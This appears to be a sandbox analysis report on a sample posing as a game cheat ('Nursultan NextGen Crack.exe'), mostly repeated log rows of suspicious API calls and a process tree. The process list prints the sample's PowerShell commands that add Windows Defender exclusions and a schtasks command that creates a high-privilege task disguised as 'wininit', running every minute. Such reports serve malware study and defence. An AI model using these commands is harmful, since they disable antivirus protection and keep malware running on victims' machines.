Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3092 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe
PID 3092 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe
PID 3092 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Windows\system32\cmd.exe
PID 3092 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1280 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1280 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 1280 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 32 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 32 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\schtasks.exe
PID 32 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\schtasks.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3752 wrote to memory of 1904 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1904 wrote to memory of 3468 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\и.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\choice.exe

choice /c 12 /n /m "Enter your choice:"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\wininit'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\Admin\wininit"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

